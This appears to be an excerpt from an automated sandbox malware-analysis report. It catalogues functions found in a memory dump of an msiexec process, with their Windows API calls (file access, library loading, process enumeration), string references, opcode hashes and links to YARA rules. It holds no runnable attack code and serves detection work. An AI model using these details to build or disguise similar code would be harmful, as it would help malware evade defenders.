                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3150196962-0
                                                                                                                                                • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: malloc
                                                                                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                                                                                • API String ID: 2803490479-1168259600
                                                                                                                                                • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmpmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1065087418-0
                                                                                                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1381354015-0
                                                                                                                                                • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2154303073-0
                                                                                                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3150196962-0
                                                                                                                                                • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$PointerRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3154509469-0
                                                                                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4232544981-0
                                                                                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3859505661-0
                                                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseFind
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
